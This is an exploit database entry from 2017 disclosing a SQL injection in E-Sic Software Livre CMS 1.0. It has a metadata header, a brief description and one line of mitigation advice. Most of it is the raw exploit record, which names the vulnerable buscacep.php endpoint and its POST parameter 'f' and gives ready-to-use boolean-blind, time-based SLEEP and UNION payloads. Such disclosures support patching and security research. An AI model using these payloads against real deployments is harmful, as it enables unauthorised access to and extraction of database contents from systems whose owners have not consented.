E-Sic Software livre CMS - Sql Injection

vendor:

E-Sic Software Livre CMS

by:

Elber Tavares

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: E-Sic Software Livre CMS

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:software_publico:e-sic_software_livre_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Kali Linux, Windows 7, 8.1, 10 - Firefox

2017

E-Sic Software livre CMS – Sql Injection

Vulnerability is in the zip code search script. An attacker can exploit this vulnerability by sending malicious payloads to the 'f' parameter of the 'buscacep.php' script. The payloads can be of type boolean-based blind, AND/OR time-based blind, or UNION query.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

# Exploit Title: E-Sic Software livre CMS - Sql Injection
# Date: 12/10/2017
# Exploit Author: Elber Tavares
# fireshellsecurity.team/
# Vendor Homepage: https://softwarepublico.gov.br/
# Version: 1.0
# Tested on: kali linux, windows 7, 8.1, 10 - Firefox
# Download
https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
More informations:

http://whiteboyz.xyz/esic-software-publico-sql-injection.html

Vulnerability is in the zip code search script
---------------------------------------------------------------------

Url: http://localhost/esiclivre/restrito/inc/buscacep.php


DATA:

Parameter: f (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: f=-1932' OR 5987=5987 AND 'dtev'='dtev

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: f=test' OR SLEEP(5) AND 'kucr'='kucr

    Type: UNION query
    Title: MySQL UNION query (random number) - 6 columns
    Payload: f=test' UNION ALL SELECT 3344,3344,

CONCAT(0x7162627a71,0x54657946565941494562654c437570647a4f4e53616744546e526663454152424e71506e564d6853,0x71786a6a71),
    3344,3344,3344#